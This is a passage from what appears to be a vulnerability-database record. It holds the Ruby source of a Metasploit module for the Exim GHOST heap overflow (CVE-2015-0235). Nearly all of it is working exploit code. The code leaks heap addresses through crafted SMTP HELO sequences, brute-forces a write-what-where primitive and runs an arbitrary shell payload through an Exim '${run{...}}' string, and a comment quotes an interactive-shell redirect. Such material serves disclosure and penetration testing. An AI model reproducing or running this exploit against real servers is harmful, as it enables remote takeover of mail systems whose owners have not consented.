old glibc? (no leaked_arch)\" failure: the remote Exim server\r\n is either not vulnerable, or not exploitable (glibc versions older than\r\n glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).\r\n ------------------------------------------------------------------------\r\n \"NUL, CR, LF in addr? (no leaked_addr)\" failure: Exim's heap address\r\n contains bad characters (NUL, CR, LF) and was therefore mangled during\r\n the information leak; this exploit is able to reconstruct most of these\r\n addresses, but not all (worst-case probability is ~1/85, but could be\r\n further improved).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a nil reply, but no shell: the remote\r\n Unix command was executed, but spawned a bind-shell or a reverse-shell\r\n that failed to connect (maybe because of a firewall, or a NAT, etc).\r\n ------------------------------------------------------------------------\r\n \"Brute-force SUCCESS\" followed by a non-nil reply, and no shell: the\r\n remote Unix command was executed, but failed to spawn the shell (maybe\r\n because the setsid command doesn't exist, or awk isn't gawk, or netcat\r\n doesn't support the -6 or -e option, or telnet doesn't support the -z\r\n option, etc).\r\n ------------------------------------------------------------------------\r\n Comments and questions are welcome!\r\n ),\r\n 'Author' => ['Qualys, Inc. <qsa[at]qualys.com>'],\r\n 'License' => BSD_LICENSE,\r\n 'References' => [\r\n ['CVE', '2015-0235'],\r\n ['US-CERT-VU', '967332'],\r\n ['OSVDB', '117579'],\r\n ['BID', '72325'],\r\n ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']\r\n ],\r\n 'DisclosureDate' => 'Jan 27 2015',\r\n 'Privileged' => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)\r\n 'Platform' => 'unix', # actually 'linux', but we execute a unix-command payload\r\n 'Arch' => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^\r\n 'Payload' => {\r\n 'Space' => 255, # the shorter the payload, the higher the probability of code execution\r\n 'BadChars' => \"\", # we encode the payload ourselves, because ^\r\n 'DisableNops' => true,\r\n 'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell\r\n },\r\n 'Targets' => [['Automatic', {}]],\r\n 'DefaultTarget' => 0\r\n ))\r\n\r\n register_options([\r\n Opt::RPORT(25),\r\n OptAddress.new('SENDER_HOST_ADDRESS', [false,\r\n 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])\r\n ], self.class)\r\n\r\n register_advanced_options([\r\n OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n # for now, no information about the vulnerable state of the target\r\n check_code = Exploit::CheckCode::Unknown\r\n\r\n begin\r\n # not exploiting, just checking\r\n smtp_connect(false)\r\n\r\n # malloc()ate gethostbyname's buffer, and\r\n # make sure its next_chunk isn't the top chunk\r\n\r\n 9.times do\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+0)\r\n smtp_recv(HELO_CODES)\r\n end\r\n\r\n # overflow (4 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x00303030\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 1024+16-1+4)\r\n # from now on, an exception means vulnerable\r\n check_code = Exploit::CheckCode::Vulnerable\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n\r\n # realloc()ate gethostbyname's buffer, and\r\n # crash (old glibc) or abort (new glibc)\r\n # on the overwritten size field\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", \"\", \"\", 2048-16-1+4)\r\n # raise an exception if no valid SMTP reply\r\n reply = smtp_recv(ANY_CODE)\r\n # can't determine vulnerable state if smtp_verify_helo() isn't called\r\n return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/\r\n # a vulnerable target should've crashed by now\r\n check_code = Exploit::CheckCode::Safe\r\n\r\n rescue\r\n peer = \"#{rhost}:#{rport}\"\r\n vprint_debug(\"#{peer} - Caught #{$!.class}: #{$!.message}\")\r\n\r\n ensure\r\n smtp_disconnect\r\n end\r\n\r\n return check_code\r\n end\r\n\r\n def exploit\r\n unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n print_status(\"Checking if target is vulnerable...\")\r\n fail_with(\"exploit\", \"Vulnerability check failed.\") if check != Exploit::CheckCode::Vulnerable\r\n print_good(\"Target is vulnerable.\")\r\n end\r\n information_leak\r\n code_execution\r\n end\r\n\r\n private\r\n\r\n HELO_CODES = '250|451|550'\r\n ANY_CODE = '[0-9]{3}'\r\n\r\n MIN_HEAP_SHIFT = 80\r\n MIN_HEAP_SIZE = 128 * 1024\r\n MAX_HEAP_SIZE = 1024 * 1024\r\n\r\n # Exim\r\n ALIGNMENT = 8\r\n STORE_BLOCK_SIZE = 8192\r\n STOREPOOL_MIN_SIZE = 256\r\n\r\n LOG_BUFFER_SIZE = 8192\r\n BIG_BUFFER_SIZE = 16384\r\n\r\n SMTP_CMD_BUFFER_SIZE = 16384\r\n IN_BUFFER_SIZE = 8192\r\n\r\n # GNU C Library\r\n PREV_INUSE = 0x1\r\n NS_MAXDNAME = 1025\r\n\r\n # Linux\r\n MMAP_MIN_ADDR = 65536\r\n\r\n def information_leak\r\n print_status(\"Trying information leak...\")\r\n leaked_arch = nil\r\n leaked_addr = []\r\n\r\n # try different heap_shift values, in case Exim's heap address contains\r\n # bad chars (NUL, CR, LF) and was mangled during the information leak;\r\n # we'll keep the longest one (the least likely to have been truncated)\r\n\r\n 16.times do\r\n done = catch(:another_heap_shift) do\r\n heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)\r\n print_debug(\"#{{ heap_shift: heap_shift }}\")\r\n\r\n # write the malloc_chunk header at increasing offsets (8-byte step),\r\n # until we overwrite the \"503 sender not yet given\" error message\r\n\r\n 128.step(256, 8) do |write_offset|\r\n error = try_information_leak(heap_shift, write_offset)\r\n print_debug(\"#{{ write_offset: write_offset, error: error }}\")\r\n throw(:another_heap_shift) if not error\r\n next if error == \"503 sender not yet given\"\r\n\r\n # try a few more offsets (allows us to double-check things,\r\n # and distinguish between 32-bit and 64-bit machines)\r\n\r\n error = [error]\r\n 1.upto(5) do |i|\r\n error[i] = try_information_leak(heap_shift, write_offset + i*8)\r\n throw(:another_heap_shift) if not error[i]\r\n end\r\n print_debug(\"#{{ error: error }}\")\r\n\r\n _leaked_arch = leaked_arch\r\n if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize\r\n (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd\r\n (error[4] =~ /\\A503 send[^e].?\\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size\r\n (error[5] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86_64\r\n\r\n elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize\r\n (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd\r\n (error[2] =~ /\\A503 [^s].?\\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size\r\n (error[3] == \"177\") # the last \\x7F of our BAD1 command, encoded as \\\\177 by string_printing()\r\n leaked_arch = ARCH_X86\r\n\r\n else\r\n throw(:another_heap_shift)\r\n end\r\n print_debug(\"#{{ leaked_arch: leaked_arch }}\")\r\n fail_with(\"infoleak\", \"arch changed\") if _leaked_arch and _leaked_arch != leaked_arch\r\n\r\n # try different large-bins: most of them should be empty,\r\n # so keep the most frequent fd_nextsize address\r\n # (a pointer to the malloc_chunk itself)\r\n\r\n count = Hash.new(0)\r\n 0.upto(9) do |last_digit|\r\n error = try_information_leak(heap_shift, write_offset, last_digit)\r\n next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes\r\n next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK\r\n count[error] += 1\r\n end\r\n print_debug(\"#{{ count: count }}\")\r\n throw(:another_heap_shift) if count.empty?\r\n\r\n # convert count to a nested array of [key, value] arrays and sort it\r\n error_count = count.sort { |a, b| b[1] <=> a[1] }\r\n error_count = error_count.first # most frequent\r\n error = error_count[0]\r\n count = error_count[1]\r\n throw(:another_heap_shift) unless count >= 6 # majority\r\n leaked_addr.push({ error: error, shift: heap_shift })\r\n\r\n # common-case shortcut\r\n if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == \"er not yet given\") or\r\n (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count(\"\\x7E-\\x7F\").nonzero?)\r\n leaked_addr = [leaked_addr.last] # use this one, and not another\r\n throw(:another_heap_shift, true) # done\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n throw(:another_heap_shift)\r\n end\r\n break if done\r\n end\r\n\r\n fail_with(\"infoleak\", \"not vuln? old glibc? (no leaked_arch)\") if leaked_arch.nil?\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr.empty?\r\n\r\n leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }\r\n leaked_addr = leaked_addr.first # longest\r\n error = leaked_addr[:error]\r\n shift = leaked_addr[:shift]\r\n\r\n leaked_addr = 0\r\n (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|\r\n break if i >= error.length\r\n leaked_addr += error.unpack('C*')[i] * (2**(i*8))\r\n end\r\n # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:\r\n leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE\r\n fail_with(\"infoleak\", \"NUL, CR, LF in addr? (no leaked_addr)\") if leaked_addr <= MMAP_MIN_ADDR\r\n\r\n print_good(\"Successfully leaked_arch: #{leaked_arch}\")\r\n print_good(\"Successfully leaked_addr: #{leaked_addr.to_s(16)}\")\r\n @leaked = { arch: leaked_arch, addr: leaked_addr }\r\n end\r\n\r\n def try_information_leak(heap_shift, write_offset, last_digit = 9)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift < MIN_HEAP_SHIFT)\r\n fail_with(\"infoleak\", \"heap_shift\") if (heap_shift & 15) != 0\r\n fail_with(\"infoleak\", \"write_offset\") if (write_offset & 7) != 0\r\n fail_with(\"infoleak\", \"last_digit\") if \"#{last_digit}\" !~ /\\A[0-9]\\z/\r\n\r\n smtp_connect\r\n\r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 11*1024+13-1 + heap_shift)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 8*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"HELO \", \"\", \"0\", \".1#{last_digit}\", \"\", 12*1024+3-1 + heap_shift-MIN_HEAP_SHIFT)\r\n begin # ^ 0x30 | PREV_INUSE\r\n smtp_recv(HELO_CODES)\r\n\r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n\r\n smtp_send(\"RCPT TO:\", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(503, 'sender not yet given')\r\n\r\n smtp_send(\"\", \"BAD1 \", method(:rand_text_alpha), \"\\x7F\\x7F\\x7F\\x7F\", \"\", 10*1024-16-1 + write_offset)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"BAD2 \", \"\", method(:rand_text_alpha), \"\\x7F\", \"\", 15*1024)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"DATA\")\r\n reply = smtp_recv(503)\r\n\r\n lines = reply[:lines]\r\n fail if lines.size <= 3\r\n fail if lines[+0] != \"503-All RCPT commands were rejected with this error:\\r\\n\"\r\n fail if lines[-2] != \"503-valid RCPT command must precede DATA\\r\\n\"\r\n fail if lines[-1] != \"503 Too many syntax or protocol errors\\r\\n\"\r\n\r\n # if leaked_addr contains LF, reverse smtp_respond()'s multiline splitting\r\n # (the \"while (isspace(*msg)) msg++;\" loop can't be easily reversed,\r\n # but happens with lower probability)\r\n\r\n error = lines[+1..-3].join(\"\")\r\n error.sub!(/\\A503-/mn, \"\")\r\n error.sub!(/\\r\\n\\z/mn, \"\")\r\n error.gsub!(/\\r\\n503-/mn, \"\\n\")\r\n return error\r\n\r\n rescue\r\n return nil\r\n end\r\n\r\n ensure\r\n smtp_disconnect\r\n end\r\n\r\n def code_execution\r\n print_status(\"Trying code execution...\")\r\n\r\n # can't \"${run{/bin/sh -c 'exec /bin/sh -i <&#{b} >&0 2>&0'}} \" anymore:\r\n # DW/26 Set FD_CLOEXEC on SMTP sockets after forking in the daemon, to ensure\r\n # that rogue child processes cannot use them.\r\n\r\n fail_with(\"codeexec\", \"encoded payload\") if payload.raw != payload.encoded\r\n fail_with(\"codeexec\", \"invalid payload\") if payload.raw.empty? or payload.raw.count(\"^\\x20-\\x7E\").nonzero?\r\n # Exim processes our run-ACL with expand_string() first (hence the [\\$\\{\\}\\\\] escapes),\r\n # and transport_set_up_command(), string_dequote() next (hence the [\\\"\\\\] escapes).\r\n encoded = payload.raw.gsub(/[\\\"\\\\]/, '\\\\\\\\\\\\&').gsub(/[\\$\\{\\}\\\\]/, '\\\\\\\\\\\\&')\r\n # setsid because of Exim's \"killpg(pid, SIGKILL);\" after \"alarm(60);\"\r\n command = '${run{/usr/bin/env setsid /bin/sh -c \"' + encoded + '\"}}'\r\n print_debug(command)\r\n\r\n # don't try to execute commands directly, try a very simple ACL first,\r\n # to distinguish between exploitation-problems and shellcode-problems\r\n\r\n acldrop = \"drop message=\"\r\n message = rand_text_alpha(command.length - acldrop.length)\r\n acldrop += message\r\n\r\n max_rand_offset = (@leaked[:arch] == ARCH_X86 ? 32 : 64)\r\n max_heap_addr = @leaked[:addr]\r\n min_heap_addr = nil\r\n survived = nil\r\n\r\n # we later fill log_buffer and big_buffer with alpha chars,\r\n # which creates a safe-zone at the beginning of the heap,\r\n # where we can't possibly crash during our brute-force\r\n\r\n # 4, because 3 copies of sender_helo_name, and step_len;\r\n # start big, but refine little by little in case\r\n # we crash because we overwrite important data\r\n\r\n helo_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) / 4\r\n loop do\r\n\r\n sender_helo_name = \"A\" * helo_len\r\n address = sprintf(\"[%s]:%d\", @sender[:hostaddr], 65535)\r\n\r\n # the 3 copies of sender_helo_name, allocated by\r\n # host_build_sender_fullhost() in POOL_PERM memory\r\n\r\n helo_ip_size = ALIGNMENT +\r\n sender_helo_name[+1..-2].length\r\n\r\n sender_fullhost_size = ALIGNMENT +\r\n sprintf(\"%s (%s) %s\", @sender[:hostname], sender_helo_name, address).length\r\n\r\n sender_rcvhost_size = ALIGNMENT + ((@sender[:ident] == nil) ?\r\n sprintf(\"%s (%s helo=%s)\", @sender[:hostname], address, sender_helo_name) :\r\n sprintf(\"%s\\n\\t(%s helo=%s ident=%s)\", @sender[:hostname], address, sender_helo_name, @sender[:ident])\r\n ).length\r\n\r\n # fit completely into the safe-zone\r\n step_len = (LOG_BUFFER_SIZE + BIG_BUFFER_SIZE) -\r\n (max_rand_offset + helo_ip_size + sender_fullhost_size + sender_rcvhost_size)\r\n loop do\r\n\r\n # inside smtp_cmd_buffer (we later fill smtp_cmd_buffer and smtp_data_buffer\r\n # with alpha chars, which creates another safe-zone at the end of the heap)\r\n heap_addr = max_heap_addr\r\n loop do\r\n\r\n # try harder the first time around: we obtain better\r\n # heap boundaries, and we usually hit our ACL faster\r\n\r\n (min_heap_addr ? 1 : 2).times do\r\n\r\n # try the same heap_addr several times, but with different random offsets,\r\n # in case we crash because our hijacked storeblock's length field is too small\r\n # (we don't control what's stored at heap_addr)\r\n\r\n rand_offset = rand(max_rand_offset)\r\n print_debug(\"#{{ helo: helo_len, step: step_len, addr: heap_addr.to_s(16), offset: rand_offset }}\")\r\n reply = try_code_execution(helo_len, acldrop, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\") if reply\r\n\r\n if reply and\r\n reply[:code] == \"550\" and\r\n # detect the parsed ACL, not the \"still in text form\" ACL (with \"=\")\r\n reply[:lines].join(\"\").delete(\"^=A-Za-z\") =~ /(\\A|[^=])#{message}/mn\r\n print_good(\"Brute-force SUCCESS\")\r\n print_good(\"Please wait for reply...\")\r\n # execute command this time, not acldrop\r\n reply = try_code_execution(helo_len, command, heap_addr + rand_offset)\r\n print_debug(\"#{{ reply: reply }}\")\r\n return handler\r\n end\r\n\r\n if not min_heap_addr\r\n if reply\r\n fail_with(\"codeexec\", \"no min_heap_addr\") if (max_heap_addr - heap_addr) >= MAX_HEAP_SIZE\r\n survived = heap_addr\r\n else\r\n if ((survived ? survived : max_heap_addr) - heap_addr) >= MIN_HEAP_SIZE\r\n # survived should point to our safe-zone at the beginning of the heap\r\n fail_with(\"codeexec\", \"never survived\") if not survived\r\n print_good \"Brute-forced min_heap_addr: #{survived.to_s(16)}\"\r\n min_heap_addr = survived\r\n end\r\n end\r\n end\r\n end\r\n\r\n heap_addr -= step_len\r\n break if min_heap_addr and heap_addr < min_heap_addr\r\n end\r\n\r\n break if step_len < 1024\r\n step_len /= 2\r\n end\r\n\r\n helo_len /= 2\r\n break if helo_len < 1024\r\n # ^ otherwise the 3 copies of sender_helo_name will\r\n # fit into the current_block of POOL_PERM memory\r\n end\r\n fail_with(\"codeexec\", \"Brute-force FAILURE\")\r\n end\r\n\r\n # our write-what-where primitive\r\n def try_code_execution(len, what, where)\r\n fail_with(\"codeexec\", \"#{what.length} >= #{len}\") if what.length >= len\r\n fail_with(\"codeexec\", \"#{where} < 0\") if where < 0\r\n\r\n x86 = (@leaked[:arch] == ARCH_X86)\r\n min_heap_shift = (x86 ? 512 : 768) # at least request2size(sizeof(FILE))\r\n heap_shift = min_heap_shift + rand(1024 - min_heap_shift)\r\n last_digit = 1 + rand(9)\r\n\r\n smtp_connect\r\n\r\n # fill smtp_cmd_buffer, smtp_data_buffer, and big_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:\", \"\", method(:rand_text_alpha), \"<#{rand_text_alpha_upper(8)}>\", \"\", BIG_BUFFER_SIZE -\r\n \"501 : sender address must contain a domain\\r\\n\\0\".length)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n\r\n smtp_send(\"RSET\")\r\n smtp_recv(250)\r\n\r\n # bulletproof Heap Feng Shui; the hard part is avoiding:\r\n # \"Too many syntax or protocol errors\" (3)\r\n # \"Too many unrecognized commands\" (3)\r\n # \"Too many nonmail commands\" (10)\r\n\r\n # / 5, because \"\\x7F\" is non-print, and:\r\n # ss = store_get(length + nonprintcount * 4 + 1);\r\n smtp_send(\"BAD1 \", \"\", \"\\x7F\", \"\", \"\", (19*1024 + heap_shift) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 5*1024+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+13-1)\r\n smtp_recv(250)\r\n\r\n smtp_send(\"BAD2 \", \"\", \"\\x7F\", \"\", \"\", (13*1024 + 128) / 5)\r\n smtp_recv(500, '\\A500 unrecognized command\\r\\n\\z')\r\n\r\n smtp_send(\"HELO \", \"\", \"0\", @sender[:hostaddr8], \"\", 3*1024+16+13-1)\r\n smtp_recv(250)\r\n\r\n # overflow (3 bytes) gethostbyname's buffer, and\r\n # overwrite its next_chunk's size field with 0x003?31\r\n # ^ last_digit\r\n smtp_send(\"EHLO \", \"\", \"0\", \".1#{last_digit}\", \"\", 5*1024+64+3-1)\r\n smtp_recv(HELO_CODES) # ^ 0x30 | PREV_INUSE\r\n\r\n # auth_xtextdecode() is the only way to overwrite the beginning of a\r\n # current_block of memory (the \"storeblock\" structure) with arbitrary data\r\n # (so that our hijacked \"next\" pointer can contain NUL, CR, LF characters).\r\n # this shapes the rest of our exploit: we overwrite the beginning of the\r\n # current_block of POOL_PERM memory with the current_block of POOL_MAIN\r\n # memory (allocated by auth_xtextdecode()).\r\n\r\n auth_prefix = rand_text_alpha(x86 ? 11264 : 11280)\r\n (x86 ? 4 : 8).times { |i| auth_prefix += sprintf(\"+%02x\", (where >> (i*8)) & 255) }\r\n auth_prefix += \".\"\r\n\r\n # also fill log_buffer with alpha chars\r\n smtp_send(\"MAIL FROM:<> AUTH=\", auth_prefix, method(:rand_text_alpha), \"+\", \"\", 0x3030)\r\n smtp_recv(501, 'invalid data for AUTH')\r\n\r\n smtp_send(\"HELO \", \"[1:2:3:4:5:6:7:8%eth0:\", \" \", \"#{what}]\", \"\", len)\r\n begin\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] !~ /#{HELO_CODES}/\r\n return reply if reply[:code] != \"250\" and reply[:lines].first !~ /argument does not match calling host/\r\n\r\n smtp_send(\"MAIL FROM:<>\")\r\n reply = smtp_recv(ANY_CODE)\r\n return reply if reply[:code] != \"250\"\r\n\r\n smtp_send(\"RCPT TO:<postmaster>\")\r\n reply = smtp_recv\r\n return reply\r\n\r\n rescue\r\n return nil\r\n end\r\n\r\n ensure\r\n smtp_disconnect\r\n end\r\n\r\n DIGITS = '([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])'\r\n DOT = '[.]'\r\n\r\n def smtp_connect(exploiting = true)\r\n fail_with(\"smtp_connect\", \"sock isn't nil\") if sock\r\n\r\n connect\r\n fail_with(\"smtp_connect\", \"sock is nil\") if not sock\r\n @smtp_state = :recv\r\n\r\n banner = smtp_recv(220)\r\n return if not exploiting\r\n\r\n sender_host_address = datastore['SENDER_HOST_ADDRESS']\r\n if sender_host_address !~ /\\A#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}#{DOT}#{DIGITS}\\z/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (nil)\") if sender_host_address.nil?\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)\")\r\n end\r\n sender_host_address_octal = \"0\" + $1.to_i.to_s(8) + \".#{$2}.#{$3}.#{$4}\"\r\n\r\n # turn helo_seen on (enable the MAIL command)\r\n # call smtp_verify_helo() (force fopen() and small malloc()s)\r\n # call host_find_byname() (force gethostbyname's initial 1024-byte malloc())\r\n smtp_send(\"HELO #{sender_host_address_octal}\")\r\n reply = smtp_recv(HELO_CODES)\r\n\r\n if reply[:code] != \"250\"\r\n fail_with(\"smtp_connect\", \"not Exim?\") if reply[:lines].first !~ /argument does not match calling host/\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_verify_hosts)\")\r\n end\r\n\r\n if reply[:lines].first =~ /\\A250 (\\S*) Hello (.*) \\[(\\S*)\\]\\r\\n\\z/mn\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (helo_try_verify_hosts)\") if sender_host_address != $3\r\n smtp_active_hostname = $1\r\n sender_host_name = $2\r\n\r\n if sender_host_name =~ /\\A(.*) at (\\S*)\\z/mn\r\n sender_host_name = $2\r\n sender_ident = $1\r\n else\r\n sender_ident = nil\r\n end\r\n fail_with(\"smtp_connect\", \"bad SENDER_HOST_ADDRESS (no FCrDNS)\") if sender_host_name == sender_host_address_octal\r\n\r\n else\r\n # can't double-check sender_host_address here, so only for advanced users\r\n fail_with(\"smtp_connect\", \"user-supplied EHLO greeting\") unless datastore['I_KNOW_WHAT_I_AM_DOING']\r\n # worst-case scenario\r\n smtp_active_hostname = \"A\" * NS_MAXDNAME\r\n sender_host_name = \"A\" * NS_MAXDNAME\r\n sender_ident = \"A\" * 127 * 4 # sender_ident = string_printing(string_copyn(p, 127));\r\n end\r\n\r\n _sender = @sender\r\n @sender = {\r\n hostaddr: sender_host_address,\r\n hostaddr8: sender_host_address_octal,\r\n hostname: sender_host_name,\r\n ident: sender_ident,\r\n __smtp_active_hostname: smtp_active_hostname\r\n }\r\n fail_with(\"smtp_connect\", \"sender changed\") if _sender and _sender != @sender\r\n\r\n # avoid a future pathological case by forcing it now:\r\n # \"Do NOT free the first successor, if our current block has less than 256 bytes left.\"\r\n smtp_send(\"MAIL FROM:\", \"<\", method(:rand_text_alpha), \">\", \"\", STOREPOOL_MIN_SIZE + 16)\r\n smtp_recv(501, 'sender address must contain a domain')\r\n\r\n smtp_send(\"RSET\")\r\n smtp_recv(250, 'Reset OK')\r\n end\r\n\r\n def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)\r\n fail_with(\"smtp_send\", \"state is #{@smtp_state}\") if @smtp_state != :send\r\n @smtp_state = :sending\r\n\r\n if not arg_pattern\r\n fail_with(\"smtp_send\", \"prefix is nil\") if not prefix\r\n fail_with(\"smtp_send\", \"param isn't nil\") if arg_prefix or arg_suffix or suffix or arg_length\r\n command = prefix\r\n\r\n else\r\n fail_with(\"smtp_send\", \"param is nil\") unless prefix and arg_prefix and arg_suffix and suffix and arg_length\r\n length = arg_length - arg_prefix.length - arg_suffix.length\r\n fail_with(\"smtp_send\", \"len is #{length}\") if length <= 0\r\n argument = arg_prefix\r\n case arg_pattern\r\n when String\r\n argument += arg_pattern * (length / arg_pattern.length)\r\n argument += arg_pattern[0, length % arg_pattern.length]\r\n when Method\r\n argument += arg_pattern.call(length)\r\n end\r\n argument += arg_suffix\r\n fail_with(\"smtp_send\", \"arglen is #{argument.length}, not #{arg_length}\") if argument.length != arg_length\r\n command = prefix + argument + suffix\r\n end\r\n\r\n fail_with(\"smtp_send\", \"invalid char in cmd\") if command.count(\"^\\x20-\\x7F\") > 0\r\n fail_with(\"smtp_send\", \"cmdlen is #{command.length}\") if command.length > SMTP_CMD_BUFFER_SIZE\r\n command += \"\\n\" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer\r\n\r\n # the following loop works around a bug in the put() method:\r\n # \"while (send_idx < send_len)\" should be \"while (send_idx < buf.length)\"\r\n # (or send_idx and/or send_len could be removed altogether, like here)\r\n\r\n while command and not command.empty?\r\n num_sent = sock.put(command)\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}\") if num_sent <= 0\r\n fail_with(\"smtp_send\", \"sent is #{num_sent}, greater than #{command.length}\") if num_sent > command.length\r\n command = command[num_sent..-1]\r\n end\r\n\r\n @smtp_state = :recv\r\n end\r\n\r\n def smtp_recv(expected_code = nil, expected_data = nil)\r\n fail_with(\"smtp_recv\", \"state is #{@smtp_state}\") if @smtp_state != :recv\r\n @smtp_state = :recving\r\n\r\n failure = catch(:failure) do\r\n\r\n # parse SMTP replies very carefully (the information\r\n # leak injects arbitrary data into multiline replies)\r\n\r\n data = \"\"\r\n while data !~ /(\\A|\\r\\n)[0-9]{3}[ ].*\\r\\n\\z/mn\r\n begin\r\n more_data = sock.get_once\r\n rescue\r\n throw(:failure, \"Caught #{$!.class}: #{$!.message}\")\r\n end\r\n throw(:failure, \"no more data\") if more_data.nil?\r\n throw(:failure, \"no more data\") if more_data.empty?\r\n data += more_data\r\n end\r\n\r\n throw(:failure, \"malformed reply (count)\") if data.count(\"\\0\") > 0\r\n lines = data.scan(/(?:\\A|\\r\\n)[0-9]{3}[ -].*?(?=\\r\\n(?=[0-9]{3}[ -]|\\z))/mn)\r\n throw(:failure, \"malformed reply (empty)\") if lines.empty?\r\n\r\n code = nil\r\n lines.size.times do |i|\r\n lines[i].sub!(/\\A\\r\\n/mn, \"\")\r\n lines[i] += \"\\r\\n\"\r\n\r\n if i == 0\r\n code = lines[i][0,3]\r\n throw(:failure, \"bad code\") if code !~ /\\A[0-9]{3}\\z/mn\r\n if expected_code and code !~ /\\A(#{expected_code})\\z/mn\r\n throw(:failure, \"unexpected #{code}, expected #{expected_code}\")\r\n end\r\n end\r\n\r\n line_begins_with = lines[i][0,4]\r\n line_should_begin_with = code + (i == lines.size-1 ? \" \" : \"-\")\r\n\r\n if line_begins_with != line_should_begin_with\r\n throw(:failure, \"line begins with #{line_begins_with}, \" \\\r\n \"should begin with #{line_should_begin_with}\")\r\n end\r\n end\r\n\r\n throw(:failure, \"malformed reply (join)\") if lines.join(\"\") != data\r\n if expected_data and data !~ /#{expected_data}/mn\r\n throw(:failure, \"unexpected data\")\r\n end\r\n\r\n reply = { code: code, lines: lines }\r\n @smtp_state = :send\r\n return reply\r\n end\r\n\r\n fail_with(\"smtp_recv\", \"#{failure}\") if expected_code\r\n return nil\r\n end\r\n\r\n def smtp_disconnect\r\n disconnect if sock\r\n fail_with(\"smtp_disconnect\", \"sock isn't nil\") if sock\r\n @smtp_state = :disconnected\r\n end\r\nend", "cvss": {"score": 10.0, "vector": 